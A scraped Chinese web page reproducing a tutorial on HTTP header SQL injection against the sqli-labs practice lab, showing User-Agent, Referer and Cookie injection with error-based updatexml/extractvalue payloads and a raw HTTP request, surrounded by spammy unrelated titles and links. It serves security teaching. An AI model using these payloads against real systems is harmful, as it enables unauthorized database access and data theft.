当前位置: 首页 > news >正文

沈阳唐朝网站建设做一个app需要多长时间

沈阳唐朝网站建设,做一个app需要多长时间,谁帮58同城做的网站,济南网站中企动力Ps: 先做实验,在有操作的基础上理解原理会更清晰更深入。 一、实验 sqli-lab 1. User-Agent注入 特点:登陆后返回用户的 User-Agent --> 服务器端可能记录用户User-Agent 输入不合法数据报错 payload: and updatexml(1,concat("~&…

Ps: 先做实验,在有操作的基础上理解原理会更清晰更深入。

一、实验 sqli-lab

1. User-Agent注入

  • 特点:登陆后返回用户的 User-Agent --> 服务器端可能记录用户User-Agent

703d0c6f-0f55-4500-a971-b9d0cf652954

  • 输入不合法数据报错

4aca6065-85d6-43dd-89b0-16a7caa4597a

  • payload:' and updatexml(1,concat("~",database(),"~"),1),'','')-- clay

  • 数据包
POST /sqli-labs/Less-18/index.php HTTP/1.1
Host: 10.49.102.86
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
X-Forward-For:
User-Agent:' and updatexml(1,concat("~",database(),"~"),1),'','')-- clay
Upgrade-Insecure-Requests: 1submit=Submit&uname=admin&passwd=admin
  • 备注:

该注入是insert语句的注入,完整SQL语句为:

$insert="INSERT INTO `security'. 'uagents'( uagent', ' ip_address', 'username')VALUES ( '$uagent' ,'$IP', $uname)";
payload有效备注
‘,’‘,’') and updatexml(1,concat(““,database(),””),1)先闭合insert
’ and updatexml(1,concat(““,database(),””),1),‘’,‘’)-- clay`后闭合insert

总结:insert类型的SQL注入时,在注入点闭合后就添加要执行的语句,而不是,闭合完整个insert语句后再添加要执行的语句。

2. Referer注入

特点: 返回用户的Referer,可能后端会记录该值

3726faf2-3584-4891-99e5-0bc3efb17fdb

85289be8-628f-49f0-995c-73d63c69c0a2

payload12138' and extractvalue(1,concat("~",database())) ,'') -- clay

b68e69f1-db3f-47c4-bcc6-6cedf52ade72

3. Cookie注入

特点: 返回,后端可能记录User-Agent和Cookie

90f536c0-61f5-4ee1-951b-6954bb5d96bc

把cookie的值删除后:

2597990e-329c-4dae-aed5-35a20e4550ce

2e912a1c-f84b-430c-877f-6d1f431d1194

payload: ' and updatexml(1,concat("~",database(),"~"),1) -- clay

fa799001-4aab-44cc-b85d-cf2f8b3a7b62

二、 HTTP头部注入讲解

一下均为自己的理解,讲的大白话一点,粗体是核心。

原理:

HTTP头部注入产生的核心原因就是,后端存在查询或记录HTTP请求头内容(数据库交互)

实验一:后端记录 User-Agent ,insert 类型的注入

实验二:后端记录 Referer ,insert 类型的注入

实验三:后端查询 cookie ,select 类型的注入

不同的注入类型存在不同的闭合方式,这个一点要注意,除上述闭合类型以外,当搜索框中存在注入时,可能需要%的闭合(模糊查询 like %xxx%)

三、总结

在这里还是再次强调一下SQL注入产生的条件:用户输入的语句带入到数据库执行

  1. 参数可控

  2. 带入到数据库执行

HTTP头部注入也是一模一样,用户可以控制HTTP请求头,后端带入到数据库执行,这两个条件缺一个都不可以!

如果对你有所帮助拜托拜托点赞收藏加评论666,更多文章内容欢迎访问笔者博客 :xclay.net

http://www.yayakq.cn/news/709/

相关文章:

  • 网站seo相关设置优化wordpress批量发布器
  • 做网站 视频加载太慢南通建筑人才网
  • 网站空间ip地址交钱做网站对方拿了钱不做该怎么办
  • 设计师效果图网站wordpress弹出框
  • 中国十大摄影网站排名游戏代理赚钱
  • 买域名建网站连运港网络公司做网站
  • 五百亿网站搬家公司企业营业执照怎么查询
  • 做网站的公司网站没做好找谁投诉百度资源
  • 如何将网站挂载域名长沙协会网站设计专业服务
  • 做淘宝客网站用什么源码好福建建设人才市场网站
  • wordpress商城模板源码seo是付费的吗
  • 那些网站做民宿做app模板网站有哪些内容
  • 英德市城乡建设局网站佛山免费网站建设
  • 做网站360业务企业网站平台建设咨询合同
  • 网站建设多少钱哪个济南兴田德润有活动吗重庆企业网站推广服务
  • 付费网站建设百度应用商店官网
  • 用Html5做网站360检测网站开发语言的工具
  • 网站建设费一般多少钱谁家的网站做的比较好
  • 中企动力属于国企吗广州网站优化排名哪家好
  • 有人用我的企业做网站如何用表格做网站
  • 网站开发实例教程实训心得如何向谷歌提交网站
  • 网站建设php教程视频开封专业做网站公司
  • 企业网站的用户需求自适应网站做多大尺寸
  • 做网站用的产品展示横幅好看的电商网站模板下载
  • 吕梁建站公司linux7 下载wordpress
  • 成都旅游网站建设地址施工企业会计核算办法
  • 新乡做网站多少钱永州冷水滩网站建设
  • 照片做3d网站石狮app网站开发
  • 2018做网站 工具东莞网站建设对比
  • 企业网站系统源码为什么百度地图嵌入网站不显示